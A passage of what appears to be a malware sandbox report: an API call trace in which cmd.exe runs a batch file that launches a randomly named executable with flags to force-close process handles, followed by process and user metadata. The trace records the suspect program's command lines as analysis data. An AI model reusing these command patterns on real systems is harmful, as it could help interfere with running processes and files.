_get_osfhandle (_FileHandle=1) returned 0x7 [0228.883] GetFileType (hFile=0x7) returned 0x2 [0228.883] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0228.883] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x45f0fc | out: lpMode=0x45f0fc) returned 1 [0228.884] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.884] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x45f128, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x45f128*=0x2) returned 1 [0228.884] GetProcessHeap () returned 0x860000 [0228.884] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0x2c) returned 0x874318 [0228.884] GetProcessHeap () returned 0x860000 [0228.884] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0xc) returned 0x860d38 [0228.884] GetProcessHeap () returned 0x860000 [0228.884] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0xc) returned 0x860d50 [0228.884] GetProcessHeap () returned 0x860000 [0228.884] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0xe) returned 0x860d68 [0228.884] _wcsnicmp (_String1="UseBackQ", _String2="usebackq", _MaxCount=0x8) returned 0 [0228.884] _wcsnicmp (_String1="Tokens=3", _String2="usebackq", _MaxCount=0x8) returned -1 [0228.885] _wcsnicmp (_String1="Tokens=", _String2="useback", _MaxCount=0x7) returned -1 [0228.885] _wcsnicmp (_String1="Toke", _String2="eol=", _MaxCount=0x4) returned 15 [0228.885] _wcsnicmp (_String1="Tokens=", _String2="delims=", _MaxCount=0x7) returned 16 [0228.885] _wcsnicmp (_String1="Token", _String2="skip=", _MaxCount=0x5) returned 1 [0228.885] _wcsnicmp (_String1="Tokens=", _String2="tokens=", _MaxCount=0x7) returned 0 [0228.885] wcstol (in: _String="3,6 delims=: \"", _EndPtr=0x45f058, _Radix=0 | out: _EndPtr=0x45f058*=",6 delims=: \"") returned 3 [0228.885] wcstol (in: _String="6 delims=: \"", _EndPtr=0x45f058, _Radix=0 | out: _EndPtr=0x45f058*=" delims=: \"") returned 6 [0228.885] _wcsnicmp (_String1="delims=:", _String2="usebackq", _MaxCount=0x8) returned -17 [0228.885] _wcsnicmp (_String1="delims=", _String2="useback", _MaxCount=0x7) returned -17 [0228.885] _wcsnicmp (_String1="deli", _String2="eol=", _MaxCount=0x4) returned -1 [0228.885] _wcsnicmp (_String1="delims=", _String2="delims=", _MaxCount=0x7) returned 0 [0228.885] GetProcessHeap () returned 0x860000 [0228.885] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x860d68 | out: hHeap=0x860000) returned 1 [0228.885] GetProcessHeap () returned 0x860000 [0228.885] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0xe) returned 0x860d68 [0228.885] GetProcessHeap () returned 0x860000 [0228.885] RtlReAllocateHeap (Heap=0x860000, Flags=0x0, Ptr=0x860d38, Size=0xe) returned 0x860d80 [0228.885] GetProcessHeap () returned 0x860000 [0228.885] RtlSizeHeap (HeapHandle=0x860000, Flags=0x0, MemoryPointer=0x860d80) returned 0xe [0228.885] GetProcessHeap () returned 0x860000 [0228.885] RtlReAllocateHeap (Heap=0x860000, Flags=0x0, Ptr=0x860d50, Size=0x14) returned 0x874350 [0228.885] GetProcessHeap () returned 0x860000 [0228.885] RtlSizeHeap (HeapHandle=0x860000, Flags=0x0, MemoryPointer=0x874350) returned 0x14 [0228.885] _wpopen (_Command="tdq963ii.exe -accepteula \"told.exe\" -nobanner", _Mode="rb") returned 0x77032960 [0229.506] feof (_File=0x77032960) returned 0 [0229.506] ferror (_File=0x77032960) returned 0 [0229.506] GetProcessHeap () returned 0x860000 [0229.506] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0x108) returned 0x874370 [0229.506] fgets (in: _Buf=0x874378, _MaxCount=256, _File=0x77032960 | out: _Buf="No matching handles found.\r\r\n", _File=0x77032960) returned="No matching handles found.\r\r\n" [0247.893] feof (_File=0x77032960) returned 0 [0247.893] ferror (_File=0x77032960) returned 0 [0247.893] GetProcessHeap () returned 0x860000 [0247.893] RtlReAllocateHeap (Heap=0x860000, Flags=0x0, Ptr=0x874370, Size=0x208) returned 0x874370 [0247.893] GetProcessHeap () returned 0x860000 [0247.893] RtlSizeHeap (HeapHandle=0x860000, Flags=0x0, MemoryPointer=0x874370) returned 0x208 [0247.894] fgets (in: _Buf=0x874395, _MaxCount=483, _File=0x77032960 | out: _Buf="", _File=0x77032960) returned 0x0 [0248.208] _pclose (in: _File=0x77032960 | out: _File=0x77032960) returned 0 [0248.209] GetProcessHeap () returned 0x860000 [0248.209] RtlReAllocateHeap (Heap=0x860000, Flags=0x0, Ptr=0x874370, Size=0x46) returned 0x874370 [0248.209] GetProcessHeap () returned 0x860000 [0248.209] RtlSizeHeap (HeapHandle=0x860000, Flags=0x0, MemoryPointer=0x874370) returned 0x46 [0248.209] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x874395, cbMultiByte=29, lpWideCharStr=0x874378, cchWideChar=29 | out: lpWideCharStr="No matching handles found.\r\r\n") returned 29 [0248.210] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x45ed4c | out: _Buffer="\r\n") returned 2 [0248.210] _get_osfhandle (_FileHandle=1) returned 0x7 [0248.210] GetFileType (hFile=0x7) returned 0x2 [0248.211] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0248.211] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x45ed0c | out: lpMode=0x45ed0c) returned 1 [0248.211] _get_osfhandle (_FileHandle=1) returned 0x7 [0248.211] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x45ed38, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x45ed38*=0x2) returned 1 [0248.213] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0248.213] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x45ed48 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0248.213] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x45ed48 | out: _Buffer=">") returned 1 [0248.213] _get_osfhandle (_FileHandle=1) returned 0x7 [0248.213] GetFileType (hFile=0x7) returned 0x2 [0248.213] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0248.213] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x45ed10 | out: lpMode=0x45ed10) returned 1 [0248.214] _get_osfhandle (_FileHandle=1) returned 0x7 [0248.214] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x45ed3c, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x45ed3c*=0x26) returned 1 [0248.214] _get_osfhandle (_FileHandle=1) returned 0x7 [0248.214] GetFileType (hFile=0x7) returned 0x2 [0248.214] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0248.214] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x45ef94 | out: lpMode=0x45ef94) returned 1 [0248.215] _get_osfhandle (_FileHandle=1) returned 0x7 [0248.215] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dbbd04*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x45efc0, lpReserved=0x0 | out: lpBuffer=0x49dbbd04*, lpNumberOfCharsWritten=0x45efc0*=0x1) returned 1 [0248.215] _get_osfhandle (_FileHandle=1) returned 0x7 [0248.215] GetFileType (hFile=0x7) returned 0x2 [0248.215] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0248.215] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x45ef78 | out: lpMode=0x45ef78) returned 1 [0248.215] _get_osfhandle (_FileHandle=1) returned 0x7 [0248.216] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x884af8*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x45efa4, lpReserved=0x0 | out: lpBuffer=0x884af8*, lpNumberOfCharsWritten=0x45efa4*=0xc) returned 1 [0248.216] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x45efb0 | out: _Buffer=" -accepteula -c -y -p handles -nobanner ") returned 41 [0248.216] _get_osfhandle (_FileHandle=1) returned 0x7 [0248.216] GetFileType (hFile=0x7) returned 0x2 [0248.216] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0248.216] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x45ef70 | out: lpMode=0x45ef70) returned 1 [0248.217] _get_osfhandle (_FileHandle=1) returned 0x7 [0248.217] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x29, lpNumberOfCharsWritten=0x45ef9c, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x45ef9c*=0x29) returned 1 [0248.218] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x45efcc | out: _Buffer=") ") returned 2 [0248.218] _get_osfhandle (_FileHandle=1) returned 0x7 [0248.218] GetFileType (hFile=0x7) returned 0x2 [0248.218] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0248.218] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x45ef8c | out: lpMode=0x45ef8c) returned 1 [0248.219] _get_osfhandle (_FileHandle=1) returned 0x7 [0248.219] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x45efb8, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x45efb8*=0x2) returned 1 [0248.219] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x45efec | out: _Buffer="\r\n") returned 2 [0248.219] _get_osfhandle (_FileHandle=1) returned 0x7 [0248.219] GetFileType (hFile=0x7) returned 0x2 [0248.220] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0248.220] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x45efac | out: lpMode=0x45efac) returned 1 [0248.220] _get_osfhandle (_FileHandle=1) returned 0x7 [0248.220] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x45efd8, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x45efd8*=0x2) returned 1 [0248.222] GetConsoleTitleW (in: lpConsoleTitle=0x45eafc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0248.223] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x8745e0, lpFilePart=0x45e61c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x45e61c*="Desktop") returned 0x25 [0248.223] SetErrorMode (uMode=0x0) returned 0x1 [0248.223] GetProcessHeap () returned 0x860000 [0248.223] RtlReAllocateHeap (Heap=0x860000, Flags=0x0, Ptr=0x8745d8, Size=0x6e) returned 0x8745d8 [0248.223] GetProcessHeap () returned 0x860000 [0248.223] RtlSizeHeap (HeapHandle=0x860000, Flags=0x0, MemoryPointer=0x8745d8) returned 0x6e [0248.223] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0248.223] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0248.223] GetProcessHeap () returned 0x860000 [0248.223] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0x120) returned 0x874650 [0248.223] GetProcessHeap () returned 0x860000 [0248.223] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0x238) returned 0x874778 [0248.224] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0248.224] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe", fInfoLevelId=0x1, lpFindFileData=0x45e3b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x45e3b8) returned 0x874928 [0248.224] FindClose (in: hFindFile=0x874928 | out: hFindFile=0x874928) returned 1 [0248.224] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0248.224] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0248.224] GetConsoleTitleW (in: lpConsoleTitle=0x45e890, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0248.224] InitializeProcThreadAttributeList (in: lpAttributeList=0x45e718, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x45e7e0 | out: lpAttributeList=0x45e718, lpSize=0x45e7e0) returned 1 [0248.224] UpdateProcThreadAttribute (in: lpAttributeList=0x45e718, dwFlags=0x0, Attribute=0x60001, lpValue=0x45e7d8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x45e718, lpPreviousValue=0x0) returned 1 [0248.224] GetStartupInfoW (in: lpStartupInfo=0x45e6d4 | out: lpStartupInfo=0x45e6d4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0248.225] lstrcmpW (lpString1="\\tdq963ii.exe", lpString2="\\XCOPY.EXE") returned -1 [0248.225] CreateProcessW (in: lpApplicationName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe", lpCommandLine="tdq963ii.exe -accepteula -c -y -p handles -nobanner", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x45e774*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="tdq963ii.exe -accepteula -c -y -p handles -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x45e7c0 | out: lpCommandLine="tdq963ii.exe -accepteula -c -y -p handles -nobanner", lpProcessInformation=0x45e7c0*(hProcess=0x74, hThread=0x84, dwProcessId=0x78c, dwThreadId=0x30c)) returned 1 [0248.239] CloseHandle (hObject=0x84) returned 1 [0248.239] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0248.239] GetProcessHeap () returned 0x860000 [0248.239] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x875f78 | out: hHeap=0x860000) returned 1 [0248.239] GetEnvironmentStringsW () returned 0x874be8* [0248.239] GetProcessHeap () returned 0x860000 [0248.239] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0xb78) returned 0x875f78 [0248.240] FreeEnvironmentStringsW (penv=0x874be8) returned 1 [0248.240] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0249.059] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x45e6b4 | out: lpExitCode=0x45e6b4*=0x1) returned 1 [0249.059] CloseHandle (hObject=0x74) returned 1 [0249.059] _vsnwprintf (in: _Buffer=0x45e7fc, _BufferCount=0x13, _Format="%08X", _ArgList=0x45e6c0 | out: _Buffer="00000001") returned 8 [0249.059] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0249.059] GetProcessHeap () returned 0x860000 [0249.059] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x875f78 | out: hHeap=0x860000) returned 1 [0249.060] GetEnvironmentStringsW () returned 0x874be8* [0249.060] GetProcessHeap () returned 0x860000 [0249.060] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0xb78) returned 0x875f78 [0249.060] FreeEnvironmentStringsW (penv=0x874be8) returned 1 [0249.060] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0249.060] GetProcessHeap () returned 0x860000 [0249.060] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x875f78 | out: hHeap=0x860000) returned 1 [0249.060] GetEnvironmentStringsW () returned 0x874be8* [0249.060] GetProcessHeap () returned 0x860000 [0249.060] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0xb78) returned 0x875f78 [0249.060] FreeEnvironmentStringsW (penv=0x874be8) returned 1 [0249.060] GetProcessHeap () returned 0x860000 [0249.060] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x860d50 | out: hHeap=0x860000) returned 1 [0249.060] DeleteProcThreadAttributeList (in: lpAttributeList=0x45e718 | out: lpAttributeList=0x45e718) [0249.060] GetProcessHeap () returned 0x860000 [0249.060] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x874370 | out: hHeap=0x860000) returned 1 [0249.060] _get_osfhandle (_FileHandle=1) returned 0x7 [0249.060] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0249.060] _get_osfhandle (_FileHandle=1) returned 0x7 [0249.060] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0249.061] _get_osfhandle (_FileHandle=0) returned 0x3 [0249.061] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0249.061] SetConsoleInputExeNameW () returned 0x1 [0249.061] GetConsoleOutputCP () returned 0x1b5 [0249.061] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0249.061] SetThreadUILanguage (LangId=0x0) returned 0x409 [0249.062] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x45f0e4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0249.062] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0249.062] _get_osfhandle (_FileHandle=3) returned 0x74 [0249.062] SetFilePointer (in: hFile=0x74, lDistanceToMove=226, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0249.062] GetProcessHeap () returned 0x860000 [0249.062] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x8748a8 | out: hHeap=0x860000) returned 1 [0249.062] GetProcessHeap () returned 0x860000 [0249.062] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x874778 | out: hHeap=0x860000) returned 1 [0249.062] GetProcessHeap () returned 0x860000 [0249.063] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x874650 | out: hHeap=0x860000) returned 1 [0249.063] GetProcessHeap () returned 0x860000 [0249.063] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x8745d8 | out: hHeap=0x860000) returned 1 [0249.063] GetProcessHeap () returned 0x860000 [0249.063] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x882c08 | out: hHeap=0x860000) returned 1 [0249.063] GetProcessHeap () returned 0x860000 [0249.063] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x8743c0 | out: hHeap=0x860000) returned 1 [0249.063] GetProcessHeap () returned 0x860000 [0249.063] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x884b38 | out: hHeap=0x860000) returned 1 [0249.063] GetProcessHeap () returned 0x860000 [0249.063] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x884af0 | out: hHeap=0x860000) returned 1 [0249.063] GetProcessHeap () returned 0x860000 [0249.063] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x860d68 | out: hHeap=0x860000) returned 1 [0249.063] GetProcessHeap () returned 0x860000 [0249.063] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x874350 | out: hHeap=0x860000) returned 1 [0249.063] GetProcessHeap () returned 0x860000 [0249.063] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x860d80 | out: hHeap=0x860000) returned 1 [0249.063] GetProcessHeap () returned 0x860000 [0249.063] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x874318 | out: hHeap=0x860000) returned 1 [0249.063] GetProcessHeap () returned 0x860000 [0249.063] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x8742b8 | out: hHeap=0x860000) returned 1 [0249.063] GetProcessHeap () returned 0x860000 [0249.063] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x874288 | out: hHeap=0x860000) returned 1 [0249.063] GetProcessHeap () returned 0x860000 [0249.063] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x874228 | out: hHeap=0x860000) returned 1 [0249.063] GetProcessHeap () returned 0x860000 [0249.063] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x8741c8 | out: hHeap=0x860000) returned 1 [0249.063] GetProcessHeap () returned 0x860000 [0249.063] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x874158 | out: hHeap=0x860000) returned 1 [0249.063] GetProcessHeap () returned 0x860000 [0249.064] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x861260 | out: hHeap=0x860000) returned 1 [0249.064] GetProcessHeap () returned 0x860000 [0249.064] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x861240 | out: hHeap=0x860000) returned 1 [0249.064] GetProcessHeap () returned 0x860000 [0249.064] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x8611f0 | out: hHeap=0x860000) returned 1 [0249.064] GetProcessHeap () returned 0x860000 [0249.064] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x861190 | out: hHeap=0x860000) returned 1 [0249.064] _get_osfhandle (_FileHandle=3) returned 0x74 [0249.064] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0249.064] ReadFile (in: hFile=0x74, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x45f0c8, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x45f0c8*=0x0, lpOverlapped=0x0) returned 1 [0249.064] GetLastError () returned 0x0 [0249.064] _get_osfhandle (_FileHandle=3) returned 0x74 [0249.064] GetFileType (hFile=0x74) returned 0x1 [0249.064] _get_osfhandle (_FileHandle=3) returned 0x74 [0249.064] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0249.064] GetProcessHeap () returned 0x860000 [0249.064] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0x400a) returned 0x884af0 [0249.064] GetProcessHeap () returned 0x860000 [0249.064] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x884af0 | out: hHeap=0x860000) returned 1 [0249.066] _get_osfhandle (_FileHandle=3) returned 0x74 [0249.066] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0249.066] ReadFile (in: hFile=0x74, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x45f0ac, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x45f0ac*=0x0, lpOverlapped=0x0) returned 1 [0249.066] GetLastError () returned 0x0 [0249.066] _get_osfhandle (_FileHandle=3) returned 0x74 [0249.066] GetFileType (hFile=0x74) returned 0x1 [0249.066] _get_osfhandle (_FileHandle=3) returned 0x74 [0249.067] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0249.067] GetProcessHeap () returned 0x860000 [0249.067] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0x400a) returned 0x884af0 [0249.067] GetProcessHeap () returned 0x860000 [0249.067] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x884af0 | out: hHeap=0x860000) returned 1 [0249.067] longjmp () [0249.067] _tell (_FileHandle=3) returned 226 [0249.067] _close (_FileHandle=3) returned 0 [0249.067] CmdBatNotification () returned 0x1 [0249.067] _get_osfhandle (_FileHandle=1) returned 0x7 [0249.067] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0249.068] _get_osfhandle (_FileHandle=1) returned 0x7 [0249.068] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0249.068] _get_osfhandle (_FileHandle=0) returned 0x3 [0249.068] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0249.069] SetConsoleInputExeNameW () returned 0x1 [0249.069] GetConsoleOutputCP () returned 0x1b5 [0249.069] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0249.069] SetThreadUILanguage (LangId=0x0) returned 0x409 [0249.069] exit (_Code=1) Process: id = "195" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x1b123000" os_pid = "0x5a8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "34" os_parent_pid = "0x184" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 742 os_tid = 0x344 Thread: id = 749 os_tid = 0x8dc Thread: id = 753 os_tid = 0x358 Process: id = "196" image_name = "tdq963ii.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe" page_root = "0x1af60000" os_pid = "0xb34" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "190" os_parent_pid = "0x708" cmd_line = "tdq963ii.exe -accepteula \"Seyes.jtp\" -nobanner" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 744 os_tid = 0x570 [0199.402] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76d30000 [0199.402] GetProcAddress (hModule=0x76d30000, lpProcName="SetEvent") returned 0x76d416c5 [0199.402] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForSingleObject") returned 0x76d41136 [0199.403] GetProcAddress (hModule=0x76d30000, lpProcName="DeviceIoControl") returned 0x76d4322f [0199.403] GetProcAddress (hModule=0x76d30000, lpProcName="DuplicateHandle") returned 0x76d41886 [0199.403] GetProcAddress (hModule=0x76d30000, lpProcName="FormatMessageW") returned 0x76d44620 [0199.403] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventW") returned 0x76d4183e [0199.404] GetProcAddress (hModule=0x76d30000, 